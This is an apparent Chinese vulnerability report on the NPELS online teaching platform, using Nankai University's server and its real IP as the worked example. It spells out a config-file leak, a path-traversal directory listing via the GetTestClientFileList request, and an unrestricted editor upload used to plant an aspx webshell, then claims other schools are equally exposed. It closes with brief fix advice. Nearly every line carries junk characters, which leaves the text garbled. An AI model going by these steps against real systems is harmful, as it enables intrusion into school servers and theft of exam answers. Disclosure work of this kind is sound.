好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
4 }! {9 s& T5 M$ A4 D
5 [4 e6 r2 Z0 F+ c+ E详细说明:
" r/ G$ G/ }, U1 v6 A 0 X4 |5 i- D# a8 Z) P/ @# W- `
以南开大学的为例:
. b+ n: L" B9 @4 S- }http://222.30.60.3/NPELS0 F% C' R9 i. d! ~& {' m
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
+ N. j8 T$ }& {% c X<setting name="Update_CommonSvr_CommonService" serializeAs="String">
' J" K. u# R- q; A3 Y<value>http://222.30.60.3/NPELS/CommonService.asmx</value>4 N3 s# x5 j' y8 @; J- z
</setting>5 \6 f0 n! x' l J$ x/ }2 c$ e
及版本号
3 }3 n" [0 ^1 n( w+ i$ |, P<add key="TVersion" value="1, 0, 0, 2187"># N. ?& ^2 R: V) {
</add>
6 I) w' h1 u. Z( \* Y直接访问
' ?5 g+ l8 V: r) ~ H1 ghttp://222.30.60.3/NPELS/CommonService.asmx
g# @/ B7 n$ G% H. d, I使用GetTestClientFileList操作,直接 HTTP GET 列目录:% x3 a6 ^5 `1 t+ K* D
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
/ @% B8 S5 X+ D P& i9 _进一步列目录(返回的网页很大,可以直接 wget 下来)
1 S% M/ Q: t- Nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../! g3 G6 h# f% {3 B; r8 S# ~6 m
0 \* |4 p* }" I* [发现
/ s- y' `- w. lhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm- m- r3 S" d# y3 |8 y; n* p3 ?# f9 N, `0 V
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
: Y, f+ M' V- w. Z上传后继续列目录找到木马地址直接访问即可, K6 F3 u8 o% e2 M% F8 _0 y
, w E7 e- B9 b; l: X
OOXX
; B- u2 Q: R! K1 g {( F, _
! J; E' ?! i7 H6 E& M- a* TGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
6 `- F( v6 }. z* w- D' t% k漏洞证明:6 }0 _* ~0 F8 y5 _. Y* L |% P# i
! w+ |& \4 m7 L- A9 x列目录:
3 b+ j. g2 m5 G N9 x3 l4 Phttp://222.30.60.3/NPELS/CommonS ... List?version=../../4 b0 ~) i/ E8 {* S" ?+ g' X, C
文件上传:$ u% R% O; {" \3 G* T
http://222.30.60.3/npelsv/editor/editor.htm+ z' i! w' V2 b. i
% x" x9 }& a7 \8 S) t; Z
上传木马:
5 F' ~- `) G j' k. r7 f5 _http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx2 v" j7 W* r& u1 D9 P B
o2 k' q0 c3 V, C$ y5 j修复方案:0 ~2 h2 A8 `) r4 m2 Q; x& o6 n! h
好像考试系统必须使用 CommonService.asmx
5 m3 b; t% L F! }1 u最好配置文件加密或者用别的方式不让它泄露出来. }1 H6 w9 }4 o; G1 b
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
' b% x# D& m' C" R0 R7 |2 Y |